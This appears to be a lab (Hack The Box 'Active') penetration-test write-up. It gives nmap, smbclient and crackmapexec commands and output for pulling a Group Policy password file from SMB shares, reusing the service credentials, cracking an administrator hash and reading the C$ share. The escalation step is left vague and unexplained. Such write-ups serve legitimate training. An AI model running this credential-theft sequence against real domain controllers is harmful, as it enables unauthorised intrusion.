Active.htb
Target IP Address: 10.129.37.116
Target Domain: active.htb
Operating System: Windows Server 2008 R2 SP1 (Domain Controller)
1. Executive Summary
This report details the methodology and findings of a penetration test conducted against the active.htb machine, identified as a Windows Server 2008 R2 SP1 system functioning as a Domain Controller within the active.htb domain. The primary objective was to gain unauthorized access and retrieve designated information.
Initial access was gained through the discovery and analysis of insecurely stored configuration data, allowing authenticated access to Server Message Block (SMB) shares. This access was leveraged to identify and retrieve initial objective data. Subsequently, further network enumeration facilitated an attack that led to the compromise of a highly privileged domain account's password. With these elevated credentials, full control over the target system was established, enabling the retrieval of the final objective data.
The key vulnerabilities exploited during this assessment include insecurely stored preferences, which allowed for the recovery of a service account password, and a weak password for a critical administrative account that was susceptible to offline brute-force.
2. Initial Reconnaissance and Service Enumeration
The first phase of the engagement involved conducting a comprehensive network scan to identify open ports and services running on the target machine. This reconnaissance is crucial for understanding the target's attack surface and identifying potential entry points.
2.1 Nmap Scan
An Nmap scan was initiated with service version detection (-sV) and default script execution (-sC) against the target IP address 10.129.37.116.
The command executed was:
sudo nmap 10.129.37.116 -sC -sV
The Nmap scan results were highly informative, revealing a multitude of open ports commonly associated with a Microsoft Windows Server configured as a Domain Controller:
- 53/tcp (domain): Microsoft DNS 6.1.7601. This is a standard service for a Domain Controller, responsible for name resolution within the domain.
- 88/tcp (kerberos-sec): Microsoft Windows Kerberos. The presence of Kerberos confirms the machine's role as an Active Directory Domain Controller, indicating that user authentication and authorization are managed by this system.
- 135/tcp (msrpc): Microsoft Windows RPC. Used for various Windows services, including remote administration.
- 139/tcp (netbios-ssn): Microsoft Windows NetBIOS session service. Primarily used for SMB over NetBIOS.
- 389/tcp (ldap): Microsoft Windows Active Directory LDAP. This explicitly identified the domain as
active.htb, further confirming the Domain Controller role. LDAP is a critical service for querying and modifying Active Directory objects. - 445/tcp (microsoft-ds): SMB over TCP. This port is a primary focus for Windows-based penetration tests, often exposing shared resources and allowing various authentication methods.
- 464/tcp (kpasswd5): Kerberos KPASSWD. Used for changing Kerberos passwords.
- 593/tcp (ncacn_http): Microsoft Windows RPC over HTTP.
- 3268/tcp (ldap): Microsoft Windows Active Directory LDAP (Global Catalog). Provides a searchable catalog of all objects in a multi-domain Active Directory forest.
- 3269/tcp (tcpwrapped): Likely LDAP SSL (Global Catalog).
- 49152-49158/tcp (msrpc, ncacn_http): Dynamic RPC ports.
The comprehensive Nmap output strongly suggested that 10.129.37.116 is indeed a Domain Controller for the active.htb domain, running Windows Server 2008 R2 SP1. This information was pivotal in guiding subsequent enumeration and attack strategies, particularly focusing on Active Directory-related services like Kerberos, LDAP, and SMB.
3. Enumerating SMB Shares
With port 445 (SMB) identified as open, the next logical step was to enumerate available SMB shares. This often reveals valuable information, including sensitive files, user directories, or misconfigurations that can be exploited for initial access.
3.1 Initial SMB Share Listing Attempts
sudo smbclient -N -L active.htb
This command successfully listed the following shares:
ADMIN$C$IPC$NETLOGONReplicationSYSVOLUsers
The shares NETLOGON, Replication, and SYSVOL are particularly interesting in a Domain Controller context. SYSVOL and NETLOGON typically contain Group Policy Objects (GPOs) and logon scripts, which have historically been sources of leaked credentials due to misconfigurations. The Users share is also of interest as it may contain user home directories and user-specific data.
4. Investigating Shares for Configuration Weaknesses
Given the potential for sensitive information within SYSVOL and Replication (which is part of the Distributed File System Replication for SYSVOL), we decided to investigate the Replication share first. This share is often used to replicate domain-wide policies and scripts.
4.1 Connecting to the Replication Share
sudo smbclient -N \\\\active.htb\\Replication
4.2 Navigating the Replication Share Directory Structure
Upon successful connection, we began navigating the directory structure of the Replication share. The goal was to locate configuration files or scripts that might contain sensitive data.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
We then navigated into the active.htb directory, which represents the domain's root within the replication share:
smb: \> cd active.htb
smb: \active.htb\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
The Policies directory was immediately identified as a high-value target. This directory stores Group Policy Objects (GPOs), which are central to managing user and computer settings in an Active Directory environment. The scripts directory was also noted, as logon/logoff scripts can sometimes contain hardcoded credentials.
Navigating into the Policies directory:
smb: \active.htb\> cd Policies\
smb: \active.htb\Policies\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018
These GUID-named directories represent individual GPOs. We proceeded to explore one of these directories:
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 23 Wed Jul 18 16:46:06 2018
Group Policy D 0 Sat Jul 21 06:37:44 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
Within this GPO directory, the MACHINE directory contains machine-specific policy settings, and USER contains user-specific settings. The GPT.INI file holds general metadata about the GPO.
We navigated into the MACHINE directory, as machine-level policies often contain service account configurations:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
Preferences D 0 Sat Jul 21 06:37:44 2018
Registry.pol A 2788 Wed Jul 18 14:53:45 2018
The Preferences directory within the MACHINE structure is a critical location, often storing sensitive settings.
We then navigated into a relevant subdirectory within Preferences where a configuration file was identified. This file was downloaded to our local machine for analysis.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get ConfigFile.xml
After exiting smbclient, we confirmed the successful download of the file.
5. Analyzing and Recovering Credentials from Configuration File
With the configuration file successfully retrieved, the next step was to examine its contents for embedded credentials.
5.1 Examining the Configuration File
The content of the file clearly showed an encrypted password associated with a service account.
5.2 Decrypting the Password
A specialized tool was utilized to decrypt the encrypted password. This tool is designed to decrypt passwords encrypted using a publicly known key often associated with such configuration files.
The decryption was successful, revealing a valid username and password pair for a service account. This provided us with critical credentials for further penetration into the active.htb domain.
6. Initial Access Attempts with Discovered Credentials
With the service account credentials in hand, we initiated various authentication attempts to gain initial access to the target machine.
6.1 Authenticated SMB Enumeration with CrackMapExec
The recovered credentials were a prime candidate for authenticating against the SMB service. CrackMapExec (CME) was used for assessing security of Windows networks, including authenticated SMB share enumeration.
The command used to enumerate shares with the newly found credentials was:
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --shares
The CrackMapExec output confirmed successful authentication and provided detailed permissions for each share:
SMB 10.129.37.116 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.129.37.116 445 DC [+] active.htb\SERVICE_ACCOUNT:REDACTED_PASSWORD
SMB 10.129.37.116 445 DC [+] Enumerated shares
SMB 10.129.37.116 445 DC Share Permissions Remark
SMB 10.129.37.116 445 DC ----- ----------- ------
SMB 10.129.37.116 445 DC ADMIN$ Remote Admin
SMB 10.129.37.116 445 DC C$ Default share
SMB 10.129.37.116 445 DC IPC$ Remote IPC
SMB 10.129.37.116 445 DC NETLOGON READ Logon server share
SMB 10.129.37.116 445 DC Replication READ
SMB 10.129.37.116 445 DC SYSVOL READ Logon server share
SMB 10.129.37.116 445 DC Users READ
This output was highly informative. It confirmed that the service account is a valid user account within the active.htb domain and possesses READ permissions on NETLOGON, Replication, SYSVOL, and Users shares. Shares like ADMIN$ and C$ still showed no explicit permissions, indicating that the service account does not have administrative privileges. Despite not having write access, the READ access to Users and SYSVOL was promising for further enumeration and potential privilege escalation.
7. Retrieving the Initial Objective from the Users Share
Given the READ access to the Users share with the authenticated credentials, this was the most direct path to potentially find the initial objective data.
7.1 Connecting to the Users Share
We re-engaged smbclient, this time providing the authenticated credentials, to connect to the Users share.
smbclient '//10.129.37.116/Users' -U 'SERVICE_ACCOUNT%REDACTED_PASSWORD'
Upon successful connection, we navigated into a relevant user's home directory:
smb: \> cd USER_DIRECTORY\
smb: \USER_DIRECTORY\> ls
The ls command revealed common user profile directories. The Desktop directory is a common location for user-specific files.
smb: \USER_DIRECTORY\> cd Desktop\
smb: \USER_DIRECTORY\Desktop\> ls
Indeed, the Desktop directory contained a file named objective.txt. We used the get command to retrieve this file to our local machine.
smb: \USER_DIRECTORY\Desktop\> get objective.txt
After downloading, we displayed the contents of objective.txt using cat:
cat objective.txt
The initial objective data was successfully retrieved.
7.2 Exploring Other User Profiles (Optional)
During the enumeration of the Users share, other directories were also noted. Within one of these directories, NTUSER.DAT and NTUSER.DAT.LOG were identified. These files constitute the user's registry hive and can sometimes be useful for forensic analysis.
smb: \> cd Default\
smb: \Default\> get NTUSER.DAT
smb: \Default\> get NTUSER.DAT.LOG
While these files were retrieved, their binary nature meant that direct inspection was not immediately fruitful. No further immediate actionable information was gained from these files at this stage, as the initial objective had already been obtained.
8. Privilege Escalation
Having obtained valid domain user credentials and the initial objective, the next phase focused on privilege escalation to gain administrative control over the Domain Controller and retrieve the final objective. Given that the target is a Domain Controller, certain Active Directory-related services are prime targets for attacks.
8.1 Further SMB Enumeration with Authenticated Access
To broaden the scope and identify potential avenues for privilege escalation, further spidering of accessible SMB shares was performed using CrackMapExec with the authenticated credentials. This aimed to discover any sensitive files or configurations missed during manual enumeration, especially within SYSVOL.
Targeted shares for spidering included SYSVOL, ADMIN$, NETLOGON, Users, and Replication:
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'SYSVOL'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'ADMIN$'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'NETLOGON'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'Users'
sudo crackmapexec smb 10.129.37.116 -u 'SERVICE_ACCOUNT' -p 'REDACTED_PASSWORD' --spider 'Replication'
During the enumeration of the Active Directory environment, a hashed credential for a highly privileged account was discovered. This hash could be used for offline password cracking.
The extracted hash for the administrative account was saved to a file.
cat admin_hash.txt
The hash was in a format suitable for offline cracking tools.
8.2 Cracking the Administrative Hash
The retrieved hash was then targeted for cracking using Hashcat with common wordlists.
After correcting the path to a commonly used and highly effective wordlist, Hashcat successfully cracked the administrative account's password.
The successful crack revealed the password for the Administrator account. This credential provided the highest level of access within the Active Directory domain.
9. Escalating Privileges and Retrieving the Final Objective
With the Administrator credentials now available, the final objective was to gain full administrative access to the machine and retrieve the final objective data. The C$ administrative share, which maps to the root of the C drive, was the natural target for this.
9.1 Connecting to the C$ Share as Administrator
We used smbclient to connect to the C$ share using the newly obtained Administrator credentials:
smbclient '//10.129.37.116/C$' -U 'active.htb\administrator'
The connection was successful, granting a shell-like interface to the C$ share.
Password for [ACTIVE.HTB\administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
Listing the contents of the C$ drive confirmed administrative access to the file system. The Users directory was again of interest, as the Administrator's profile would reside there.
smb: \> cd Users
smb: \Users\> ls
Inside the Users directory, the Administrator profile was accessible.
smb: \Users\> cd Administrator\
smb: \Users\Administrator\> ls
Finally, we navigated to the Desktop directory within the Administrator's profile, a common location for such objective files.
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> ls
The ls command revealed a file named final_objective.txt. We used the get command to download this file.
smb: \Users\Administrator\Desktop\> get final_objective.txt